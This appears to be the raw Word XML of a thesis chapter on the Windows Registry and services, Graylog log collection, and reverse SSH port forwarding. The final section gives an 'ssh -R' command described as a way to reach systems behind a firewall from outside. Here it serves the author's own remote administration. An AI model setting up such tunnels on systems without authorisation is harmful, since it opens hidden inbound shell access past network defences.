      <w:r w:rsidRPr="00A738C2">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2</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">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8"/>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“%windir%”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r w:rsidR="004534AE">
        <w:t>is defined as</w:t>
      </w:r>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End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\hivelist.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has to expand its size, it will expand the size in block-granular increments. The first block of a hive is called “base block”. </w:t>
      </w:r>
      <w:r w:rsidR="00D01F87">
        <w:t>In many ways similar to the PE header, the first hive first block contains a magic signature call “regf”,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r w:rsidR="003B77C9">
        <w:t>SystemRoot\CONFIG\SAM), an update sequence numbers,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r w:rsidRPr="00325366">
              <w:t>kn</w:t>
            </w:r>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(kv),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(ks)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9" w:name="_Toc484886361"/>
      <w:r w:rsidRPr="00325EC6">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3</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00325EC6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Registry hive cells and their data types.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>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40" w:name="_Toc483834778"/>
      <w:bookmarkStart w:id="41" w:name="_Toc485239530"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="008A2754">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="008A2754">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC \s 1 ">
        <w:r w:rsidR="008A2754">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> Cell data type segments in Registry hive.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
      <w:bookmarkEnd w:id="41"/>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r w:rsidRPr="007634B2">
        <w:t>hbin</w:t>
      </w:r>
      <w:r w:rsidR="00A432FD">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="007634B2">
        <w:t xml:space="preserve"> and a field that records the offset into the hive file of the bin and the bin's size.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430F22" w:rsidRDefault="00F41346" w:rsidP="00FA40B2">
      <w:r>
        <w:t>Using bin instead of cells to track active parts of the Registry, system can reduce the management overheads. The question is why using bins makes system run smoother than cells? For answering that question, we have to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particular key, we have to locate the cell containing that key’s subkey lists using the subkey-list cell. For each subkey cell, we check the subkey’s name to fine the one we want to locate.</w:t>
      </w:r>
      <w:r w:rsidR="00E05464">
        <w:t xml:space="preserve"> Let’s take a look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2" w:name="_Toc483834779"/>
      <w:bookmarkStart w:id="43" w:name="_Toc485239531"/>
      <w:r w:rsidRPr="00AB2F74">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3</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00AB2F74">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example of cell indexes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkEnd w:id="43"/>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r w:rsidR="007235C2">
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ake a look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End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 xml:space="preserve">With a cell index, Configuration Manager can calculate the location of a cell by adding the cell index to the base of the in-memory hive image. This is the task of “Ntldr” (Abbreviation for “NT Loader”) does with the SYSTEM hive when the system boots. When the system boots, Ntldr reads entire SYSTEM hive and load it </w:t>
      </w:r>
      <w:r w:rsidR="00C500CD">
        <w:t>into memory as a read-only hive, then adds the cell index to the base of the in-memory hive image to locate the cells. However, hives growth by size when they have more subkeys and values added to them, that leads to the system has to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End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 xml:space="preserve">Figure 2.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4" w:name="_Toc483834780"/>
      <w:bookmarkStart w:id="45" w:name="_Toc485239532"/>
      <w:r w:rsidRPr="00AD10D8">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4</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00AD10D8">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Configuration Manager implements a strategy for handling noncontiguous memory buffer problems.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
      <w:bookmarkEnd w:id="45"/>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End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Contains all the actively loaded user profiles on the computer. HKEY_CURRENT_USER is a subkey of HKEY_USERS. HKEY_USERS is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Contains configuration information particular to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6" w:name="_Toc484886362"/>
      <w:r w:rsidRPr="00ED091A">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4</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00ED091A">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Root keys and their descriptions.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>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has to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\ResourceMap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 xml:space="preserve">A series of nested arrays that is designed to store a device driver's list of possible hardware resources the driver or one of the physical devices it controls can use. The system writes a subset of this list in the \ResourceMap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\HardwareDescription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Data without any particular type.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7" w:name="_Toc484886363"/>
      <w:r w:rsidRPr="00ED091A">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5</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00ED091A">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Registry value types and their descriptions.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>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8" w:name="_Toc485239578"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00095BB2">
        <w:t xml:space="preserve"> Service</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>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End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End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rPr>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:id w:val="1329481418"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00FB3953" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C111F5" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:instrText xml:space="preserve">CITATION MSD1 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00FB3953" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:noProof/>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:t>(7)</w:t>
          </w:r>
          <w:r w:rsidR="00FB3953" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="560368523"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr>
          <w:rPr>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
        </w:sdtEndPr>
        <w:sdtContent>
          <w:r w:rsidR="00FB3953" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C111F5" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:instrText xml:space="preserve">CITATION MSD \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00FB3953" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:noProof/>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:t xml:space="preserve"> (8)</w:t>
          </w:r>
          <w:r w:rsidR="00FB3953" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>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rPr>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:id w:val="1443188206"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00AF24DE" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C111F5" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:instrText xml:space="preserve">CITATION Tec05 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00AF24DE" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:noProof/>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:t>(9)</w:t>
          </w:r>
          <w:r w:rsidR="00AF24DE" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>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9" w:name="_Toc483834781"/>
      <w:bookmarkStart w:id="50" w:name="_Toc485239533"/>
      <w:r w:rsidRPr="00C44A6F">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5</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">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9"/>
      <w:bookmarkEnd w:id="50"/>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 xml:space="preserve">the service entry key. For example, a service named “AxInstSV” which has its entry key stored at “HKLM\SYSTEM\CurrentControlSet \Services\AxInstSv”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51" w:name="_Toc483834782"/>
      <w:bookmarkStart w:id="52" w:name="_Toc485239534"/>
      <w:r w:rsidRPr="00C44A6F">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6</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">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51"/>
      <w:bookmarkEnd w:id="52"/>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r w:rsidRPr="00135336">
              <w:t>DependOnGroup</w:t>
            </w:r>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r w:rsidRPr="00135336">
              <w:t>DependOnService</w:t>
            </w:r>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r w:rsidRPr="00135336">
              <w:t>DiagnosticsMessageFile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name of the resource DLL that contains the event description strings for those events that the service writes into the application event log. Resource DLLs are located in the \Program Files\Exchsrvr\Res directory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:t>DisplayName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r w:rsidRPr="00135336">
              <w:t>ErrorControl</w:t>
            </w:r>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r w:rsidRPr="00135336">
              <w:lastRenderedPageBreak/>
              <w:t>FailureActions</w:t>
            </w:r>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Names the load-ordering group of which this service is a member. Note that setting this value can override the setting of the DependOnService value.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:t>ImagePath</w:t>
            </w:r>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Files\\Exchsvr\\Bin\\mad.exe".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r w:rsidRPr="00135336">
              <w:t>ObjectName</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LocalService account, this parameter is set to NT AUTHORITY\LocalService. It is also possible to specify an </w:t>
            </w:r>
            <w:r w:rsidRPr="00247427">
              <w:lastRenderedPageBreak/>
              <w:t>account name in the form DomainName\UserName.</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the service type as file system driver, device driver, a service that runs its own process, or a service that shares a process with one or more other services. MSExchangeSA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3" w:name="_Toc484886364"/>
      <w:r w:rsidRPr="00C44A6F">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6</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">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3"/>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The startup type can be set to “disable”, which tells SCM not to start the service at startup, the service also cannot be started by any mean as well. The dependencies between services are important that we should take a look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r w:rsidRPr="002B7458">
        <w:t>ObjectName</w:t>
      </w:r>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has to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End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has to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4" w:name="_Toc485239579"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Graylog</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>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a large </w:t>
      </w:r>
      <w:r w:rsidR="009676F8">
        <w:t>number</w:t>
      </w:r>
      <w:r w:rsidR="007E3DD2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B60E4">
        <w:t>of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End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has to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whether or not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t>has_field(“src_ip”) &amp;&amp; has_field(“dst_ip”)</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t>cidr_match(“10.10.10.0/24”, to_ip($message.g12_remote_ip))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“has_field” and getting a string “src_ip”. The function will return true if there is a field named “src_ip” inside the message. In this comparison, rule “has firewall fields” wants the message</w:t>
      </w:r>
      <w:r w:rsidR="00845030">
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> contain both “src_ip” and “dst_ip” field. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C5BAA" w:rsidRDefault="008C5BAA" w:rsidP="0033002B">
      <w:r>
        <w:t xml:space="preserve">The second rule wants to check whether the network address 10.10.10.0 whose subnet mask is /24 matched the IP of the message that are process. The function “to_ip”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5" w:name="_Toc483834783"/>
      <w:bookmarkStart w:id="56" w:name="_Toc485239535"/>
      <w:r w:rsidRPr="00EA77C6">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7</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00EA77C6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Graylog working model.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
      <w:bookmarkEnd w:id="56"/>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End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7" w:name="_Toc483834784"/>
      <w:bookmarkStart w:id="58" w:name="_Toc485239536"/>
      <w:r w:rsidRPr="00EA77C6">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8</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00EA77C6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> The correlation between Graylog server and Graylog Collector Sidecar.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
      <w:bookmarkEnd w:id="58"/>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NXLog or Winlogbeat (for Windows) and Filebeat (for Linux). </w:t>
      </w:r>
      <w:r w:rsidR="0031762B">
        <w:t xml:space="preserve">On the other side, Graylog server should be configure for supporting the appropriate backend that can work with the agent. In the concept of this thesis, we use Filebeat </w:t>
      </w:r>
      <w:r w:rsidR="0031762B">
        <w:lastRenderedPageBreak/>
        <w:t>for connecting the agent on our log hardware, since we configured it to run on Debian core Unix system, to the Graylog server. Therefore, to make this be straightforward, we would like to only explain the working concept of Filebeat comparing to NXLog, without discussing about Winlogbeat in any detail.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22AC8" w:rsidRDefault="0031762B" w:rsidP="00D22AC8">
      <w:r>
        <w:t xml:space="preserve">NXLog and Filebeat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Filebeat instead of NXLog are the programing language they use to code and deploy their agent, and Filebeat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Filebeat is written in </w:t>
      </w:r>
      <w:r w:rsidR="00215BF8">
        <w:t xml:space="preserve">Beats platform which uses Golang as its mainly developing language while NXLog use C for developing its agent. Golang is a flexible, lightweight and powerful when handling multiple threads, which helps us greatly in managing hundreds of agents deployed in the network. We believe, from the practice that Golang run smoother and handling threads better than C without using too much system resources, Filebeat could be deployed and it can handle multiple concurrent tasks without consuming too much resource on our system. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00215BF8" w:rsidRDefault="00215BF8" w:rsidP="00A8226C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>The second reason for choosing Filebeat is that Filebeat are developed by Elastic, which is the company develops the Elasticsearch Graylog server is using for its operations in managing and searching log data. Therefore, Filebeat is built in to Graylog Collector Sidecare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Filebeat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Filebeat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A Graylog Collector Sidecard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9" w:name="_Toc483834785"/>
      <w:bookmarkStart w:id="60" w:name="_Toc485239537"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="008A2754">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="008A2754">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC \s 1 ">
        <w:r w:rsidR="008A2754">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA77C6">
        <w:t>Example configuration of Graylog Collector Sidecar.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
      <w:bookmarkEnd w:id="60"/>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r w:rsidRPr="00EA77C6">
              <w:t>server_url</w:t>
            </w:r>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r w:rsidRPr="00EA77C6">
              <w:t>update_interval</w:t>
            </w:r>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r w:rsidRPr="00EA77C6">
              <w:t>tls_skip_verify</w:t>
            </w:r>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r w:rsidRPr="00EA77C6">
              <w:t>send_status</w:t>
            </w:r>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r w:rsidRPr="00CF077E">
              <w:t>list_log_files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>Send a directory listing to Graylog and display it on the host status page, e.g. /var/log. This can also be a list of directories</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00EA77C6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>node_id</w:t>
            </w:r>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r w:rsidRPr="00CF077E">
              <w:t>collector_id</w:t>
            </w:r>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r w:rsidRPr="00CF077E">
              <w:lastRenderedPageBreak/>
              <w:t>log_path</w:t>
            </w:r>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r w:rsidRPr="00CF077E">
              <w:t>log_rotation_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>Rotate the stdout and stderr logs of each collector after X seconds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00EA77C6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>log_max_age</w:t>
            </w:r>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61" w:name="_Toc484886365"/>
      <w:r w:rsidRPr="00F95A3B">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7</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00F95A3B">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Graylog Collector Sidecar configuration parameters and their descriptions.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>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Graylog server can function individually, or can be connect</w:t>
      </w:r>
      <w:r w:rsidR="00DD628B">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> together by configuring them to work in cluster environments. In cluster mode, Graylog servers connect together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2" w:name="_Toc483834786"/>
      <w:bookmarkStart w:id="63" w:name="_Toc485239538"/>
      <w:r w:rsidRPr="004E0912">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10</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004E0912">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Graylog servers and Elasticsearch servers deployed in Cluster mode.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
      <w:bookmarkEnd w:id="63"/>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have to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gets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4" w:name="_Toc483834787"/>
      <w:bookmarkStart w:id="65" w:name="_Toc485239539"/>
      <w:r w:rsidRPr="008D3B35">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11</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008D3B35">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example of a dashboard.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
      <w:bookmarkEnd w:id="65"/>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realtime while they are processed </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1235779385"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEnd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realtime by the help of pipelines. </w:t>
      </w:r>
      <w:r w:rsidR="00763FEA">
        <w:t>Every message that comes in is matched against the rules of a stream. For message that match any or all of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6" w:name="_Toc483834788"/>
      <w:bookmarkStart w:id="67" w:name="_Toc485239540"/>
      <w:r w:rsidRPr="00F06FEA">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2</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12</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00F06FEA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Messages are processed in stream.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
      <w:bookmarkEnd w:id="67"/>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has to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There could be any scenarios when a stream rule takes too long to match, therefore a</w:t>
      </w:r>
      <w:r w:rsidR="00EA3EC9">
        <w:t xml:space="preserve"> large</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> number of messages have to be waited</w:t>
      </w:r>
      <w:r w:rsidR="004D192C">
        <w:t xml:space="preserve">. The message processing can be stall, therefore, those waiting messages have to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End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7D073C"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7D073C" w:rsidRDefault="007D073C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003802AB" w:rsidRDefault="007D073C" w:rsidP="007D073C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc485239580"/>
      <w:r w:rsidRPr="00344A17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Reverse SSH Port Forwarding</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRDefault="007D073C" w:rsidP="007D073C">
      <w:r w:rsidRPr="00344A17">
        <w:t>Reverse SSH Port Forwarding specifies that the given port on the remote server host is to be forwarded to the given host and port on the local side. To try to put this as simple as can be, Reverse SSH is a technique through which you can access systems that are behind a firewall from the outside world.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRPr="007D073C" w:rsidRDefault="007D073C" w:rsidP="007D073C">
      <w:r w:rsidRPr="00344A17">
        <w:t>So instead of your machine doing a simple SSH, the server does an SSH and through the port forwarding makes sure that you can SSH back to the server machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRPr="007D073C" w:rsidRDefault="007D073C" w:rsidP="007D073C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D073C">
        <w:t>How to reverse ssh port forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRPr="007D073C" w:rsidRDefault="007D073C" w:rsidP="007D073C">
      <w:r w:rsidRPr="007D073C">
        <w:t>In order to SSH into a machine behind a firewall you will need to use Reverse SSH Port Forwarding. The machine in question needs to open an SSH connection to the outside world and include a -R tunnel whose entry point is the remote side (from server in our example) to connect to your machine, allocate a port there and make certain that any connection request on that port is then forwarded to the SSH port of the remote side (server).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRPr="007D073C" w:rsidRDefault="007D073C" w:rsidP="007D073C">
      <w:r w:rsidRPr="007D073C">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>From the remote server side run the following command on the server:</w:t>
      </w:r>
      <w:r w:rsidRPr="007D073C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRPr="007D073C" w:rsidRDefault="00A53CB7" w:rsidP="00A53CB7">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="007D073C" w:rsidRPr="007D073C">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">sh –R 2210:localhost:22 </w:t>
      </w:r>
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r w:rsidR="007D073C" w:rsidRPr="007D073C">
          <w:rPr>
            <w:i/>
          </w:rPr>
          <w:t>username@yourMachine.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRDefault="007D073C" w:rsidP="007D073C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D073C">
        <w:t>Install and configuration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19">
      <w:r w:rsidRPr="00A53CB7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>On Clientside:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Install openssh with this command</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sudo apt-get install openssh-server openssh-client</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19"/>
